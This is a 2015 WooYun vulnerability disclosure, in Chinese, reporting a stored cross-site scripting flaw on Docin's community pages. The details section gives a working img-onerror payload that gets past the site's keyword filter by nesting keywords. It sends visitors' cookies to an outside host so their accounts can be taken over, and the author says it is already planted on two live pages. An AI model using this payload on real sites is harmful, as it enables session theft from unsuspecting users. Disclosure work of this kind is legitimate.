当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145918

漏洞标题:看我通过xss登录其他人豆丁账号(二)

相关厂商:豆丁网

漏洞作者: 逆流冰河

提交时间:2015-10-11 22:05

修复时间:2015-10-16 22:06

公开时间:2015-10-16 22:06

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-11: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

其实,我很气愤,我提交豆丁的漏洞http://www.wooyun.org/bugs/wooyun-2015-0139714
被他们偷偷修改了,然后在wooyun上,忽略了,这样无良的商家,我真的不想提,本来想通过这个漏洞赚钱的,又怕被叫去喝茶.哎
跪求忽略

详细说明:

1, WooYun: 看我通过xss登录其他人豆丁账号的 被豆丁改后,我就不能xss了,但突然发现豆丁非常可爱,用了替换的方法,把alert,javascript等单词替换了,所以我一下xss:
<img src=1 onerror="jjavascriptavascript:var xmlHttpRequest=null;if(window.ActiveXObject){mlHttpRequest=new ActiveXObject('Microsoft.XMLHTTP');}else if(window.XMLHttpRequest){xmlHttpRequest=new XMLHttpRequest();}if(null!=xmlHttpRequest){xmlHttpRequest.open('GET',alert'halertttp://itfsy.cn/wooyun?site=docin&cookies='+document.cookie,true);xmlHttpRequest.send();}"/>
有点复杂,目前在http://shequ.docin.com/app/shequ/themeview?tid=119579
和http://shequ.docin.com/app/shequ/themeview?tid=119360中,已经写入了存储型的xss了

dd1.jpg


2,具体的操作和 WooYun: 看我通过xss登录其他人豆丁账号的 个一样的
3,看看cookies库吧

dd2.jpg


4,审核同学要是没有在线,请联系本人

漏洞证明:

如上

修复方案:

我本来要做坏事的,但白帽子的颜色不想玷污
修复吧
To:豆丁 我是你们忠实用户,但bfmssloveycc这个号被你们封了,
原因不说了,看在漏洞的面子上,解封吧.

版权声明:转载请注明来源 逆流冰河@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-16 22:06

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无